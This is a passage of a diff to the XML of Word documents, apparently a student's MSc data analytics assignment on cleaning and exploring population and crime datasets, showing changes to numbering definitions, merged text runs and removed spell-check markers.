+        <w:t>visualize,  clean, verify if is there any “bad data” (null or bad formatted data), and after merge these datasets.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16043,7 +13592,7 @@
     <w:p/>
     <w:p/>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId13"/>
+      <w:footerReference w:type="default" r:id="rId17"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1134" w:header="709" w:footer="709" w:gutter="0"/>
       <w:pgBorders w:offsetFrom="page">
@@ -17252,6 +14801,155 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="42D222BE"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="2796FD26"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="476E1581"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="76C603AC"/>
@@ -17373,7 +15071,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4CFE6204"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="08A06254"/>
@@ -17522,7 +15220,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="517C4A0B"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="9B22E250"/>
@@ -17671,7 +15369,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5344241A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="7E446BC4"/>
@@ -17992,7 +15690,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="536E5AC0"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="8CDAEE96"/>
@@ -18141,7 +15839,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5B273C87"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="2AA8E13E"/>
@@ -18254,16 +15952,16 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="648F1753"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="7E446BC4"/>
     <w:numStyleLink w:val="ImportedStyle1"/>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="725D2623"/>
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="674C097A"/>
     <w:multiLevelType w:val="multilevel"/>
-    <w:tmpl w:val="87A8D2E8"/>
+    <w:tmpl w:val="9F9468A6"/>
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -18409,35 +16107,184 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="725D2623"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="87A8D2E8"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="1760440869">
-    <w:abstractNumId w:val="9"/>
+    <w:abstractNumId w:val="10"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="305356629">
-    <w:abstractNumId w:val="7"/>
+    <w:abstractNumId w:val="8"/>
   </w:num>
   <w:num w:numId="3" w16cid:durableId="1166743486">
     <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="4" w16cid:durableId="1173181685">
-    <w:abstractNumId w:val="8"/>
+    <w:abstractNumId w:val="9"/>
   </w:num>
   <w:num w:numId="5" w16cid:durableId="1246454614">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="16"/>
   </w:num>
   <w:num w:numId="6" w16cid:durableId="1393307185">
     <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="7" w16cid:durableId="1530295400">
-    <w:abstractNumId w:val="11"/>
+    <w:abstractNumId w:val="12"/>
   </w:num>
   <w:num w:numId="8" w16cid:durableId="2134978705">
     <w:abstractNumId w:val="6"/>
   </w:num>
   <w:num w:numId="9" w16cid:durableId="1819345686">
-    <w:abstractNumId w:val="10"/>
+    <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="10" w16cid:durableId="1624070426">
-    <w:abstractNumId w:val="13"/>
+    <w:abstractNumId w:val="14"/>
   </w:num>
   <w:num w:numId="11" w16cid:durableId="881406841">
     <w:abstractNumId w:val="1"/>
@@ -18449,10 +16296,16 @@
     <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="14" w16cid:durableId="1958953252">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="13"/>
   </w:num>
   <w:num w:numId="15" w16cid:durableId="1294672183">
     <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="16" w16cid:durableId="354817324">
+    <w:abstractNumId w:val="15"/>
+  </w:num>
+  <w:num w:numId="17" w16cid:durableId="584535353">
+    <w:abstractNumId w:val="7"/>
   </w:num>
 </w:numbering>
 </file>

--- a/MSC_DA_CA1_Jose_Mario.docx
+++ b/MSC_DA_CA1_Jose_Mario.docx
@@ -295,37 +295,12 @@
                 <w:lang w:val="pt-BR"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:i/>
                 <w:lang w:val="pt-BR"/>
               </w:rPr>
-              <w:t>Bharathi</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:i/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:i/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t>Chakravarthi</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:i/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t>/</w:t>
+              <w:t>Bharathi Chakravarthi/</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -338,17 +313,8 @@
                 <w:i/>
                 <w:lang w:val="pt-BR"/>
               </w:rPr>
-              <w:t xml:space="preserve">Marina </w:t>
+              <w:t>Marina Iantorno</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:i/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t>Iantorno</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -3259,7 +3225,6 @@
                 <w:lang w:eastAsia="en-IE"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
@@ -3268,31 +3233,8 @@
                 <w:szCs w:val="16"/>
                 <w:lang w:eastAsia="en-IE"/>
               </w:rPr>
-              <w:t>Dún</w:t>
+              <w:t>Dún Laoghaire-Rathdown</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-                <w:lang w:eastAsia="en-IE"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> Laoghaire-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="16"/>
-                <w:szCs w:val="16"/>
-                <w:lang w:eastAsia="en-IE"/>
-              </w:rPr>
-              <w:t>Rathdown</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -5192,7 +5134,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Data </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5204,7 +5145,6 @@
         </w:rPr>
         <w:t>Wrangling</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5268,25 +5208,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">This process will be performed on </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Jupyter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> notebook: </w:t>
+        <w:t xml:space="preserve">This process will be performed on Jupyter notebook: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5452,6 +5374,38 @@
     <w:p>
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>* Duplicates / NaN</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -5482,9 +5436,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve">1 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">1 Exploratory </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5494,9 +5447,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t>Exploratory</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>D</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5506,7 +5458,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">ata </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5517,7 +5469,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t>D</w:t>
+        <w:t>A</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5528,42 +5480,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve">ata </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>A</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>nalysis</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (EDA) Method and Insights</w:t>
+        <w:t>nalysis (EDA) Method and Insights</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5583,25 +5500,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">EDA allows us to gain an overall understanding of the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>dataframes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>, detect</w:t>
+        <w:t>EDA allows us to gain an overall understanding of the dataframes, detect</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5767,49 +5666,21 @@
         </w:rPr>
         <w:t xml:space="preserve">After the first process, “Data Wrangling”, the </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>population_df</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">dataset is shown </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>bellow</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>:</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">population_df </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>dataset is shown bellow:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5904,43 +5775,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">The </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>crime_df</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> dataset is shown </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
